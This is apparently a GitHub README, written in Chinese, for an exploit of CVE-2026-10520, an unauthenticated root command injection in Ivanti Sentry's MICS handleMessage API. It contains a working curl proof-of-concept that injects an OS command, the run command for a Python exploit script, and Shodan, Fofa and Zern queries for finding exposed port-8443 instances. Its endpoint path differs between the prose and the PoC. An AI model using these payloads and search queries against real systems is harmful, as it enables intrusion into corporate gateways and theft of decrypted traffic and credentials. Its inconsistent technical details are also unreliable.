error-inside/CVE-2026-10520

# CVE-2026-10520 [][01] [][01] [](./LICENSE) [](./LICENSE) [Ivanti Sentry][07]（原名 MobileIron Sentry）是一款企业安全网关，负责代理移动设备与企业内部后端资源（如电子邮件、SharePoint 和内部 Web 应用程序）之间的流量。它负责执行*移动设备管理* (MDM) 策略，终结加密的移动会话，并为企业级应用程序部署颁发基于证书的身份验证。Sentry 实例通常通过 **8443** 端口面向互联网开放，从而暴露了 MICS (Mobile Iron Configuration Service) 管理 API。 **CVE-2026-10520** 是一个**无需身份验证的 OS 命令注入**漏洞，影响 **R10.5.2、R10.6.2 和 R10.7.1 之前**的 Ivanti Sentry 版本（CVSSv3.1：**10 严重**，已被列入 CISA KEV 名单）。该漏洞存在于 **MICS API** 端点 `/mics/api/v2/sentry/mics/handleMessage` 中，该端点接受通过 URL 编码的 `message` **POST** 正文传递的 **XML 包装**的系统命令，且没有任何身份验证或输入验证。攻击者一旦访问到该易受攻击的端点，就能以 **root** 身份执行任意 OS 命令，从而获得对主机的完全控制权——包括已解密的企业流量、已存储的凭据以及所有受管理的移动设备数据。 ## PoC ``` # 通过 MICS handleMessage endpoint 注入 'id' 命令（无需身份验证） curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \ -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: close" \ --data-urlencode "message=execute system /configuration/system/commandexec 1id" ``` ## 使用方法 ``` python CVE-2026-10520-X7.py ``` * [Zern][04] : `title:"Ivanti System Manager: Sign In"` * [Fofa][05] : `body="sentry" && body="System Manager" && port="8443"`, `title="Ivanti System Manager: Sign In"`, `icon_hash=="1407597555"` * [Shodan][06] : `http.html:"Ivanti Standalone Sentry System Manager" port:8443` , `http.title:Ivanti port:8443`, `http.html:"Ivanti" http.html:"Sentry" port:8443` ## 相关资源 * [OpenCVE — Ivanti Sentry 中通过 OS 命令注入实现 Root 级别的 RCE][01] * [NIST — CVE-2026-10520 详情][02] * [Ivanti Sentry — 官方产品页面][07] ## 作者 * ErrorInside // SCT ## 许可证 SCT-PL

标签：CISA项目, CVE-2026-10520, PoC, 命令注入, 暴力破解